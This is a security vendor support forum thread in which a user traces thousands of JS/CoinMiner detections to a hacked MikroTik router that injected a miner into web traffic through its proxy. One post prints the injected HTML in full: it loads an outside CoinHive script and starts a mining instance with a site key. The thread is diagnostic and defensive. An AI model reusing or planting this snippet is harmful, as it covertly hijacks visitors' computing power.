MAGIK José Rocha 2 Posted August 31, 2018 Share Posted August 31, 2018 Hi, We have a computer with more than 10.000 detected threats like the one bellow: Threat: JS/CoinMiner.AH Process: C:\Windows\System32\wscript.exe Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login Is this a sign that the computer is infected or this is the result of attempts to infect it? Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted August 31, 2018 Administrators Share Posted August 31, 2018 In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive. Link to comment Share on other sites More sharing options...
itman 1,746 Posted August 31, 2018 Share Posted August 31, 2018 You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts. If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show want service is behind the activity. Link to comment Share on other sites More sharing options...
MAGIK José Rocha 2 Posted September 1, 2018 Author Share Posted September 1, 2018 On 8/31/2018 at 2:39 PM, Marcos said: In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive. Here are the collected logs on the affected machine. Thanks for your help. ees_logs.zip Link to comment Share on other sites More sharing options...
MAGIK José Rocha 2 Posted September 3, 2018 Author Share Posted September 3, 2018 (edited) I've been able to find the origin of this detections and already solved the problem. When I was trying to understand the origin of this trojans, I've noticed that some os the addresses where legit and doesn't raise any problems outside our client network. So I started a search for some kind of proxy that could inject malicious code tho legit http pages and find out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine. The hack has been possible because of this vulnerability on Mikrotik Router OS https://blog.mikrotik.com/security/winbox-vulnerability.html I've changed every passwords, disabled the web proxy and deleted the firewall rule, so now everything if fine. @itman, @Marcos Thanks for the tips Edited September 3, 2018 by MAGIK José Rocha Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted September 3, 2018 Administrators Share Posted September 3, 2018 We appreciate your feedback José. In other cases with different brands of routers, a factory reset followed and upgrading the firmware didn't help. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted September 4, 2018 Administrators Share Posted September 4, 2018 Here's a good write-up of exploitation of Mikrotik routers' webproxy feature: https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-–-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Link to comment Share on other sites More sharing options...
MAGIK José Rocha 2 Posted September 4, 2018 Author Share Posted September 4, 2018 Here is the html source for the page that runs the miner: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>"$(url)"</title> <_script src="https://coinhive.com/lib/coinhive.min.js"></script> <_script> var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2}); miner.start(); </script> </head> <frameset> <frame src="$(url)"></frame> </frameset> </html> Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted September 4, 2018 Administrators Share Posted September 4, 2018 20 minutes ago, MAGIK José Rocha said: Here is the html source for the page that runs the miner: Yes. That is exactly what triggers the detection and a screen shot of this was also included in the write-up mentioned above. Link to comment Share on other sites More sharing options...
Recommended Posts